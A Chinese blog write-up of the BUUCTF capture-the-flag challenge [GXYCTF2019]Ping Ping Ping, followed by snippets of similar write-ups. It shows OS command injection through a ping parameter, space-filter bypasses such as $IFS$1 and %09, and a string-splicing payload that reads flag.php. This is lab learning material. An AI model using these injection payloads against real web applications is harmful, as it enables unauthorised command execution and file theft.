Web buuctf [GXYCTF2019]Ping Ping Ping

最新推荐文章于 2022-07-26 21:17:02 发布
最新推荐文章于 2022-07-26 21:17:02 发布
阅读量195 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/119722451
版权

1.根据界面提示,在网址上输入参数?ip=1

2.url参数添加注入

分析靶机存在注入,且flag应该是在flag.php中

根据提示,应该是过滤了空格

Linux中绕过空格过滤的方法

  1. ${IFS}替换
  2. $IFS$1替换
  3. ${IFS替换
  4. %20替换
  5. <和<>重定向符替换
  6. %09替换

尝试绕过

可以看出${IFS}存在被过滤的字符,换$IFS$1试试

flag也被过滤?

 换一个index.php

 从代码中可以看出来过滤了什么

利用字符拼接,构造playload

?ip=1;yhl=g;cat$IFS$1fla$yhl.php

可以参考一下比较好的博客:https://blog.csdn.net/qq_46184013/article/details/107061110?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162903718416780366583429%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162903718416780366583429&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-107061110.pc_search_similar&utm_term=%5BGXYCTF2019%5DPing+Ping+Ping&spm=1018.2226.3001.4187

半杯雨水敬过客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 4970
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[GXYCTF2019]Ping Ping Ping
pakho_C的博客
02-01 1398
[GXYCTF2019]Ping Ping Ping 打开靶场 就只有一个提示,直接按照提示进行测试 会返回ping ip的结果,联想到另外一道题,里面介绍了管道符的使用 [ACTF2020 新生赛]Exec 尝试直接使用管道符 使用ls查看目录下的文件,尝试访问flag.php 根据提示,应该是空格被过滤了,需要绕过空格 命令执行漏洞利用及绕过方式总结 常用的绕过方式: ${IFS} $IFS$1 < <> {cat,flag.php} //用逗号实现空格功能 %09
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1307
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
BUUCTF-[GXYCTF2019]Ping Ping Ping
qq_62875941的博客
12-28 368
打开链接 /?ip=(GET传参方式) 这题跟[ACTF2020 新生赛]Exec1差不多 那我们先看看有啥文件 /?ip=;ls或者/?ip=127.0.0.1;ls (ip地址写啥都行,其中127.0.0.1ping的是本机的地址) 发现里面有flag.php文件 但是当我去查看flag文件时,发现flag、空格、/、\等符号都被过滤了,当时也在这卡了很久 下面来总结一下常见的绕过方法 1.空格 (1)%20 (2)%09 (3)<> (4)$..
CTF入门笔记之ping
qq_37410729的博客
11-02 3974
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
web页面实现ping 命令
02-02
在网页上实现ping命令,可以扩展到Tracert命令 在网页上实现ping命令,可以扩展到Tracert命令
javascript模拟的Ping效果代码 (Web Ping
10-28
JS虽然发送不了真正Ping的ICMP数据包,但Ping的本质仍然是请求/回复的时间差,HTTP自然可以实现此功能.
LabVIEW实现网络Ping IP测试
07-10
LabVIEW实现网络Ping IP测试,输入IP地址,可实现自动ping IP地址测试。 项目可直接运行~
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 661
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
BugKu CTF(杂项篇MISC)—ping
网络安全
02-01 3380
CTFBugKu CTF(杂项篇MISC)攻与防ping题目是1个压缩包,里面放了1个pcap文档。pcap文件是wireshark配置脚本文件。可以用Wireshark软件打开,wi...
CTF\bugku-MISC-ping
weixin_51559947的博客
11-15 2676
下载附件解压发现是一个流量包使用Wireshark软件打开 用wireshark软件打开,全都是ICMP协议,无法用TCP流追踪 打开每一个协议包挨个查看发现每个协议包都有不同 挨个包查看组成的就是flag 以此类推得到flag{dc76a1eee6e3822877ed627e0a04ab4a} ...
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7775
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
CTF_Web_[GXYCTF2019]Ping Ping Ping
最新发布
十二_的博客
07-26 1656
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令不执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9425
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9350
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
buuctf web小结
qq_42551635的博客
04-25 4513
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
BUUCTF部分web题解(easysql,easy_tornado,Ping Ping Ping
weixin_44300286的博客
09-15 518
easysql 经过测试,发现过滤了很多东西,但有堆叠注入 查询语句大概是 select $_GET['query'] || flag from flag 别问我是怎么知道的,问就是看的wp 构造payload:*,1,得到select *,1 || flag from flag,即可查出表中的内容 还可以用另一种解法:通过堆叠注入,设置sql_mode的值为PIPES_AS_CONCAT,从而将||视为字符串的连接操作符而非或运算符。 1;set sql_mode=PIPES_AS_CONCAT;s

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值